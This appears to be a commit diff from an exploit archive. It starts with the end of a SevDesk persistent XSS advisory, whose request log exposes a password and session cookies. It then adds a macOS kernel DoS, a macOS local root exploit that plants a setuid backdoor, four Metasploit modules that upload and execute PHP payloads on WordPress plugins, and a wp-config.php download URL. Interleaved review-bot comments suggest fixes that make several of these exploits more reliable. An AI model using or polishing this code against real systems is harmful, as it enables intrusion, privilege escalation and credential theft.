user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects
|
||||
to malicious source and persistent manipulation of affected or connected application modules.
|
||||
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Registration to SevDesk
|
||||
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] surname
|
||||
[+] firstname
|
||||
[+] family name
|
||||
|
||||
Affected Module(s):
|
||||
[+] Dasboard Index - rightHead & feedcontent
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by low privileged application user accounts with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce the vulnerability
|
||||
|
||||
1. Register an account by usage of the following webpage https://my.sevdesk.de/register/
|
||||
2. Include to the surname, family name and firstname your own script code as payload
|
||||
3. Save the registration form and go to the website https://my.sevdesk.de/
|
||||
4. Login with the user account data
|
||||
5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dasboard index (rightHead < name > feedcontent)
|
||||
6. Successful reproduce of the application-side security vulnerability!
|
||||
|
||||
|
||||
PoC: rightHead > Displayname (First- & Lastname)
|
||||
|
||||
<div id="middleHead">
|
||||
<input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." />
|
||||
</div>
|
||||
<div id="rightHead">
|
||||
<div style="float:right;margin-top:5px;text-align: right;padding-right:5px;">
|
||||
<div style="color:#fff;padding:3px;margin-bottom:2px;">
|
||||
<span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div>
|
||||
<a href="/admin/company">Einstellungen</a> |
|
||||
<a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div id="headNav" style="top:80px;">
|
||||
<div class="headwrapper">
|
||||
<ul id="mainNavigation">
|
||||
|
||||
|
||||
PoC: Verlauf > feedcontent
|
||||
|
||||
<div>
|
||||
<div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody">
|
||||
<div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent">
|
||||
a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des
|
||||
<img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf
|
||||
"archiviert" geändert
|
||||
</div></div><div class="clearfix"></div></div>
|
||||
<div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody">
|
||||
<div class="headline">Samstag, 30. August 2014 - 02:14
|
||||
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] (Registration sevDesk) ---
|
||||
Status: 200[OK]
|
||||
POST https://my.sevdesk.de/register/save Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[my.sevdesk.de]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
|
||||
Accept[application/json, text/javascript, */*; q=0.01]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
X-Requested-With[XMLHttpRequest]
|
||||
Referer[https://my.sevdesk.de/register]
|
||||
Content-Length[119]
|
||||
Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411;
|
||||
optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149;
|
||||
__utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586;
|
||||
km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041]
|
||||
Connection[keep-alive]
|
||||
Pragma[no-cache]
|
||||
Cache-Control[no-cache]
|
||||
POST-Daten:
|
||||
name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]]
|
||||
surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]]
|
||||
familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]]
|
||||
username[support%40vulnerability-lab.com]
|
||||
password[chaos666]
|
||||
Response Header:
|
||||
Date[Tue, 02 Sep 2014 11:44:30 GMT]
|
||||
Server[Apache/2.2.22 (Debian)]
|
||||
X-Powered-By[PHP/5.4.4-14+deb7u7]
|
||||
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
||||
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
||||
Pragma[no-cache]
|
||||
Vary[Accept-Encoding]
|
||||
Content-Encoding[gzip]
|
||||
Content-Length[94]
|
||||
Keep-Alive[timeout=5, max=99]
|
||||
Connection[Keep-Alive]
|
||||
Content-Type[text/html; charset=utf-8]
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://my.sevdesk.de/register/save
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerbility can be patched by a secure parse and encode of the affected rightHead & feedcontent values in the dashboard application index.
|
||||
Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the important name values.
|
||||
|
||||
Note: The issue has been patched by the manufacturer since 2015-02-01
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerabilities in the main dasboard application is estimated as medium. (CVSS 5.9)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
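Review bot: The PoC session log publishes what look like live credentials and session identifiers — `password[chaos666]`, the `PHPSESSID` and analytics cookies, and the `username[support%40vulnerability-lab.com]` account — which should be redacted in a public advisory even after the vendor fix. The advisory is internally inconsistent: `Severity Level: High` against the twice-stated `estimated as medium ... (CVSS 5.9)`, the title's `3.10` against `Web Application 3.1.0` under Affected Product(s), and `surname` in the parameter list against `surename` in the captured POST data. `Dasboard` (several occurrences) should read `Dashboard`.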
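--- a/platforms/osx/dos/36814.c
+++ b/platforms/osx/dos/36814.c
@@ -0,0 +1,80 @@
+/*
+* 2015, Maxime Villard, CVE-2015-1100
+* Local DoS caused by a missing limit check in the fat loader of the Mac OS X
+* Kernel.
+*
+* $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
+* $ ./Mac-OS-X_Fat-DoS BINARY-NAME
+*
+* Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
+* Analysis: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <spawn.h>
+#include <unistd.h>
+#include <err.h>
+#include <mach-o/fat.h>
+#include <sys/stat.h>
+
+#define MAXNUM (4096)
+#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))
+
+void CraftBinary(char *name)
+{
+struct fat_header fat_header;
+struct fat_arch *arches;
+size_t i;
+int fd;
+
+memset(&fat_header, 0, sizeof(fat_header));
+fat_header.magic = FAT_MAGIC;
+fat_header.nfat_arch = 4096;
+
+if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
+err(-1, "calloc");
+for (i = 0; i < MAXNUM0; i++)
+arches[i].cputype = CPU_TYPE_I386;
+
+if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
+err(-1, "open");
+if (write(fd, &fat_header, sizeof(fat_header)) == -1)
+err(-1, "write");
+if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
+err(-1, "write");
+if (fchmod(fd, S_IXUSR) == -1)
+err(-1, "fchmod");
+close(fd);
+free(arches);
+}
+
+void SpawnBinary(char *name)
+{
+cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
+char *argv[] = { "Crazy Horse", NULL };
+char *envp[] = { NULL };
+posix_spawnattr_t attr;
+size_t set = 0;
+int ret;
+
+if (posix_spawnattr_init(&attr) == -1)
+err(-1, "posix_spawnattr_init");
+if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
+err(-1, "posix_spawnattr_setbinpref_np");
+fprintf(stderr, "----------- Goodbye! -----------\n");
+ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
+fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
+}
+
+int main(int argc, char *argv[])
+{
+if (argc != 2) {
+printf("Usage: %s BINARY-NAME\n", argv[0]);
+} else {
+CraftBinary(argv[1]);
+SpawnBinary(argv[1]);
+}
+}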
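Review bot: `open(name, O_CREAT|O_RDWR)` in CraftBinary omits the mode argument that O_CREAT requires, so a newly created file carries whatever value happens to sit in the variadic slot until the later `fchmod`, and without `O_TRUNC` an existing file at `name` keeps any bytes beyond the two writes; `if ((fd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700)) == -1)` addresses both. `err(-1, ...)` exits with status 255, where `err(1, ...)` is the conventional form. `fat_header.nfat_arch = 4096` is written in host byte order while the arch array is sized by the byte-swapped `MAXNUM0`, and the relationship between the two is not obvious from the code; a comment beside `#define MAXNUM0` explaining why the array is sized by the swapped value would help the next reader.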
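--- a/platforms/osx/local/36739.m
+++ b/platforms/osx/local/36739.m
@@ -0,0 +1,128 @@
+/* osx-irony-assist.m
+*
+* Copyright (c) 2010 by <mu-b@digit-labs.org>
+*
+* Apple MACOS X < 10.9/10? local root exploit
+* by mu-b - June 2010
+*
+* - Tested on: Apple MACOS X <= 10.8.X
+*
+* $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
+*
+* The most ironic backdoor perhaps in the history of backdoors.
+* Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
+* uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
+* in a directory,
+*
+* drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
+*
+* without being root, now how did you do that?
+*
+* Copy what you want, wherever you want it, with whatever permissions you
+* desire, hmmm, backdoor?
+*
+* This is now fixed, so I guess this is OK :-)
+*
+* - Private Source Code -DO NOT DISTRIBUTE -
+* http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#import <SecurityFoundation/SFAuthorization.h>
+#import <Foundation/Foundation.h>
+
+/* where you want to write it! */
+#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"
+
+int do_assistive_copy(const char *spath, const char *dpath)
+{
+NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
+id authenticatorInstance, *userUtilsInstance;
+Class authenticatorClass, userUtilsClass;
+
+(void) pool;
+NSBundle *adminBundle =
+[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
+
+authenticatorClass = [adminBundle classNamed:@"Authenticator"];
+if (!authenticatorClass)
+{
+fprintf (stderr, "* failed locating the Authenticator Class\n");
+return (EXIT_FAILURE);
+}
+
+printf ("* Found Authenticator Class!\n");
+authenticatorInstance =
+[authenticatorClass performSelector:@selector(sharedAuthenticator)];
+
+userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
+if (!userUtilsClass)
+{
+fprintf (stderr, "* failed locating the UserUtilities Class\n");
+return (EXIT_FAILURE);
+}
+
+printf ("* found UserUtilities Class!\n");
+userUtilsInstance = (id *) [userUtilsClass alloc];
+
+SFAuthorization *authObj = [SFAuthorization authorization];
+OSStatus isAuthed = (OSStatus)
+[authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
+withObject:authObj];
+printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
+
+NSData *suidBin =
+[NSData dataWithContentsOfFile:[NSString stringWithCString:spath
+encoding:NSASCIIStringEncoding]];
+if (!suidBin)
+{
+fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
+return (EXIT_FAILURE);
+}
+
+NSDictionary *createFileWithContentsDict =
+[NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
+forKey:(id)NSFilePosixPermissions];
+if (!createFileWithContentsDict)
+{
+fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
+return (EXIT_FAILURE);
+}
+
+CFStringRef writePath =
+CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wobjc-method-access"
+[*userUtilsInstance createFileWithContents:suidBin path:writePath
+attributes:createFileWithContentsDict];
+#pragma clang diagnostic pop
+printf ("* now execute suid backdoor at %s\n", dpath);
+
+/* send the "Distributed Object Message" to the defaultCenter,
+* is this really necessary? (not for ownage)
+*/
+[[NSDistributedNotificationCenter defaultCenter]
+postNotificationName:@"com.apple.accessibility.api"
+object:@"system.preferences" userInfo:nil
+deliverImmediately:YES];
+
+return (EXIT_SUCCESS);
+}
+
+int main (int argc, const char * argv[])
+{
+
+printf ("Apple MACOS X < 10.9/10? local root exploit\n"
+"by: <mu-b@digit-labs.org>\n"
+"http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
+
+if (argc <= 1)
+{
+fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
+exit (EXIT_SUCCESS);
+}
+
+return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
+}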
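Review bot: The destination selection in `main` is off by one: `argc >= 2 ? argv[2] : BACKDOOR_BIN` picks `argv[2]` when only a source was supplied (argc == 2), and `argv[2]` is then the NULL terminator of the argument vector, so `dpath` is NULL and the `BACKDOOR_BIN` default is never used; the usage string promises an optional destination, so it should read `argc >= 3 ? argv[2] : BACKDOOR_BIN`. In `do_assistive_copy`, `userUtilsInstance` is declared `id *`, the result of `[userUtilsClass alloc]` is cast to that pointer type and then dereferenced as the receiver in `[*userUtilsInstance createFileWithContents:...]`, which passes the first word of the object rather than the object itself; this looks like it was meant to be a plain `id` receiver, to be confirmed against the intended method. The autorelease pool created at the top is never drained on any of the return paths; a `[pool drain];` before each return would balance it.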
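--- a/platforms/php/remote/36809.rb
+++ b/platforms/php/remote/36809.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::HTTP::Wordpress
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Wordpress Reflex Gallery Upload Vulnerability',
+'Description' => %q{
+This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
+version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
+},
+'Author' =>
+[
+'Unknown', # Vulnerability discovery
+'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['EDB', '36374'],
+['OSVDB', '88853'],
+['WPVDB', '7867']
+],
+'Privileged' => false,
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' => [['Reflex Gallery 3.1.3', {}]],
+'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date.
+'DefaultTarget' => 0)
+)
+end
+
+def check
+check_plugin_version_from_readme('reflex-gallery', '3.1.4')
+end
+
+def exploit
+php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+data = Rex::MIME::Message.new
+data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
+post_data = data.to_s
+
+time = Time.new
+year = time.year.to_s
+month = "%02d" % time.month
+
+res = send_request_cgi({
+'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
+'method' => 'POST',
+'vars_get' => {
+'Year' => "#{year}",
+'Month' => "#{month}"
+},
+'ctype' => "multipart/form-data; boundary=#{data.bound}",
+'data' => post_data
+})
+
+if res
+if res.code == 200 && res.body =~ /success|#{php_pagename}/
+print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+register_files_for_cleanup(php_pagename)
+else
+fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+end
+else
+fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+end
+
+print_status("#{peer} - Calling payload...")
+send_request_cgi(
+'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
+)
+end
+end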
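Review bot: `'Year' => "#{year}"` and `'Month' => "#{month}"` in the `vars_get` hash, and `"#{year}", "#{month}"` in the final `normalize_uri` call, interpolate values that `year = time.year.to_s` and `month = "%02d" % time.month` have already made Strings; passing `year` and `month` directly says the same thing without the extra allocation. `time = Time.new` with no arguments is the same as `Time.now`, which is the idiomatic spelling for "the current time". The `if res` / `if res.code == 200` nesting in `exploit` would read more directly as a guard, `fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless res`, followed by the single status check.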
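--- a/platforms/php/remote/36810.rb
+++ b/platforms/php/remote/36810.rb
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::HTTP::Wordpress
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
+'Description' => %q{
+This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
+plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
+},
+'Author' =>
+[
+'Claudio Viviani', # Vulnerability discovery
+'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
+['WPVDB', '7896']
+],
+'Privileged' => false,
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]],
+'DisclosureDate' => 'Apr 12 2015',
+'DefaultTarget' => 0)
+)
+end
+
+def check
+check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
+end
+
+def exploit
+php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
+
+data = Rex::MIME::Message.new
+data.add_part('upload', nil, nil, 'form-data; name="action"')
+data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
+data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
+post_data = data.to_s
+
+res = send_request_cgi({
+'uri' => wordpress_url_admin_ajax,
+'method' => 'POST',
+'ctype' => "multipart/form-data; boundary=#{data.bound}",
+'data' => post_data
+})
+
+if res
+if res.code == 200 && res.body =~ /filename/
+begin
+new_php_pagename = JSON.parse(res.body)["filename"]
+rescue JSON::ParserError
+fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename')
+end
+print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
+register_files_for_cleanup(new_php_pagename)
+else
+fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+end
+else
+fail_with(Failure::Unknown,'ERROR')
+end
+
+print_status("#{peer} - Calling payload...")
+send_request_cgi(
+'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
+)
+end
+end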
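Review bot: Two multipart parts carry the same field name `action` (`'upload'` before the file part and `'nm_webcontact_upload_file'` after it); a form parser keeps one value per name, so one of the two parts is dead and the intent should be stated in a comment or the unused part dropped. `JSON.parse(res.body)["filename"]` can be nil when the body matches `/filename/` but has no such key, and that nil then flows into `print_good`, `register_files_for_cleanup` and the final `normalize_uri`; a `fail_with(Failure::UnexpectedReply, 'Response carried no filename') unless new_php_pagename` after the `begin`/`end` closes that gap. `fail_with(Failure::Unknown,'ERROR')` tells the operator nothing and lacks the space after the comma; 36809.rb in this commit uses 'Server did not respond in an expected way' for the same branch, and the same `'ERROR'` message recurs in 36811.rb and 36812.rb.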
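--- a/platforms/php/remote/36811.rb
+++ b/platforms/php/remote/36811.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::HTTP::Wordpress
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Wordpress Creative Contact Form Upload Vulnerability',
+'Description' => %q{
+This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
+Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
+},
+'Author' =>
+[
+'Gianni Angelozzi', # Vulnerability discovery
+'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['EDB', '35057'],
+['OSVDB', '113669'],
+['WPVDB', '7652']
+],
+'Privileged' => false,
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' => [['Creative Contact Form 0.9.7', {}]],
+'DisclosureDate' => 'Oct 22 2014',
+'DefaultTarget' => 0)
+)
+end
+
+def check
+check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
+end
+
+def exploit
+php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+data = Rex::MIME::Message.new
+data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
+post_data = data.to_s
+
+res = send_request_cgi({
+'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
+'method' => 'POST',
+'ctype' => "multipart/form-data; boundary=#{data.bound}",
+'data' => post_data
+})
+
+if res
+if res.code == 200 && res.body =~ /files|#{php_pagename}/
+print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+register_files_for_cleanup(php_pagename)
+else
+fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+end
+else
+fail_with(Failure::Unknown, 'ERROR')
+end
+
+print_status("#{peer} - Calling payload...")
+send_request_cgi(
+'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
+)
+end
+end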
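Review bot: `res.body =~ /files|#{php_pagename}/` interpolates the generated filename into a regex unescaped, so the `.` of `.php` matches any character; the value is letters plus that suffix, so nothing breaks, but `Regexp.escape(php_pagename)` states the intent and protects the line if the name generator ever changes (36809.rb has the same pattern at `/success|#{php_pagename}/`). The `/files|.../` alternation also makes the success test pass on any body containing the word "files", which is a weaker signal than the filename alone. The nested `if res` / `if res.code == 200` would read more directly as a guard followed by the single status check.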
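--- a/platforms/php/remote/36812.rb
+++ b/platforms/php/remote/36812.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::HTTP::Wordpress
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Wordpress Work The Flow Upload Vulnerability',
+'Description' => %q{
+This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,
+version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.
+},
+'Author' =>
+[
+'Claudio Viviani', # Vulnerability discovery
+'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['WPVDB', '7883'],
+['EDB', '36640'],
+['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
+],
+'Privileged' => false,
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' => [['Work The Flow 2.5.2', {}]],
+'DisclosureDate' => 'Mar 14 2015',
+'DefaultTarget' => 0)
+)
+end
+
+def check
+check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.4')
+end
+
+def exploit
+php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+data = Rex::MIME::Message.new
+data.add_part('upload', nil, nil, 'form-data; name="action"')
+data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
+post_data = data.to_s
+
+res = send_request_cgi({
+'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
+'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+'method' => 'POST',
+'ctype' => "multipart/form-data; boundary=#{data.bound}",
+'data' => post_data
+})
+
+if res
+if res.code == 200
+print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+register_files_for_cleanup(php_pagename)
+else
+fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+end
+else
+fail_with(Failure::Unknown, 'ERROR')
+end
+
+print_status("#{peer} - Calling payload...")
+send_request_cgi(
+'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
+'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+)
+end
+end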
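Review bot: `if res.code == 200` treats any 200 response as a completed upload, unlike the sibling modules 36809.rb and 36811.rb in this commit, which also inspect the body; an error page served with status 200 reaches `print_good` and registers a cleanup for a file that was never written. Checking the body for the generated name as the others do, `if res.code == 200 && res.body =~ /#{Regexp.escape(php_pagename)}/`, keeps the four modules consistent. The `fail_with(Failure::Unknown, 'ERROR')` branch gives the operator no hint of what failed; the wording used in 36809.rb is the better template.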
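--- a/platforms/php/webapps/36774.txt
+++ b/platforms/php/webapps/36774.txt
@@ -0,0 +1,31 @@
+# Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
+# Vendor :Miwisoft LLC
+# Vendor Homepage :http://www.miwisoft.com
+# Version :1.0.5
+# Tested on :Win7/Chrome/Firefox
+# Exploit Author :Necmettin COSKUN =>@babayarisi
+# Discovery date :04/15/2015
+
+
+MiwoFTP is a file manager plugin for Wordpress.
+
+
+Description
+================
+Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.
+
+Poc Exploit
+================
+http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
+
+================
+#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
+
+#http://www.exploit-db.com/exploits/36763/
+#http://www.exploit-db.com/exploits/36762/
+#http://www.exploit-db.com/exploits/36761/
+================
+
+Discovered by:
+================
+Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!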
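--- a/platforms/php/webapps/36800.txt
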